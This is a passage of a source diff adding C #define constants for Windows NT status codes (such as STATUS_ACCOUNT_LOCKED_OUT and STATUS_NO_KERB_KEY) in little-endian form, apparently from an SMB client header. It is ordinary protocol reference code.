++#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
++#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
++#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
++#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
++#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
++#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
++#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
++#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
++#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
++#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
++#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
++#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
++#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
++#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
++#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
++#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
++#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
++#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
++#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
++#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
++#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
++#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
++#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
++#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
++#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
++#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
++#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
++#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
++#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
++#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
++#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
++#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
++#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
++#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
++#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
++#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
++#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
++#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
++#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
++#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
++#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
++#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
++#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
++#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
++#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
++#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
++#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
++#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
++#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
++#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
++#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
++#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
++#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
++#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
++#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
++#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
++#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
++#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
++#define STATUS_RETRY cpu_to_le32(0xC000022D)
++#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
++#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
++#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
++#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
++#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
++#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
++#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
++#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
++#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
++#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
++#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
++#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
++#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
++#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
++#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
++#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
++#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
++#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
++#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
++#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
++#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
++#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
++#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
++#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
++#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
++#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
++#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
++#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
++#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
++#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
++#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
++#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
++#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
++#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
++#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
++#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
++#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
++#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
++#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
++#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
++#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
++#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
++#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
++#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
++#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
++#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
++#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
++#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
++#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
++#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
++#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
++#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
++#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
++#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
++#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
++#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
++#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
++#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
++#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
++#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
++#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
++#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
++#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
++#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
++#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
++#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
++#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
++#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
++#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
++#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
++#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
++#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
++#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
++#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
++#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
++#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
++#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
++#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
++#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
++#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
++#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
++#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
++#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
++#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
++#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
++#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
++#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
++#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
++#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
++#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
++#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
++#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
++#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
++#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
++#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
++#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
++#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
++#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
++#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
++#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
++#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
++#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
++#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
++#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
++#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
++#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
++#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
++#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
++#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
++#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
++#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
++#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
++#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
++#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
++#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
++#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
++#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
++#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
++#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
++#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
++#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
++#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
++#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
++#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
++#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
++#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
++#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
++#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
++#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
++#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
++#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
++#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
++#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
++#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
++#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
++#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
++#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
++#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
++#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
++#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
++#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
++#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
++#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
++#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
++#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
++#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
++#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
++#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
++#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
++#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER cpu_to_le32(0xC00002DB)
++#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
++#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
++#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
++#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
++#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
++#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
++#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
++#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
++#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
++#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
++#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
++#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
++#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
++#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
++#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
++#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
++#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
++#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
++#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
++#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
++#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
++#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
++#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
++#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
++#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
++#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
++#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
++#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
++#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
++#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
++#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
++#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
++#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
++#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
++#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
++#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
++#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
++#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
++#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
++#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
++#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
++#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
++#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
++#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
++#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
++#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
++#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
++#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
++#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
++#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
++#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
++#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
++#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
++#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
++#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
++#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
++#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
++#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
++#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
++#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
++#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
++#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
++#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
++#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
++#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
++#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
++#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
++#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
++#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
++#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
++#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
++#define STATUS_MCA_OCCURED cpu_to_le32(0xC000036A)
++#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
++#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
++#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
++#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
++#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
++#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
++#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
++#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
++#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
++#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
++#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
++#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
++#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
++#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
++#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
++#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
++#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
++#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
++#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
++#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
++#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
++#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
++#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
++#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
++#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
++#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
++#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
++#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
++#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
++#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
++#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
++#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
++#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
++#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
++#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
++#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
++#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
++#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
++#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
++#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
++#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
++#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
++#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
++#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
++#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
++#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
++#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE cpu_to_le32(0xC0000416)
++#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
++#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
++#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
++#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
++#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
++#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
++#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
++#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
++#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
++#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
++#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
++#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
++#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
++#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
++#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
++#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
++#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
++#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
++#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
++#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
++#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
++#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
++#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
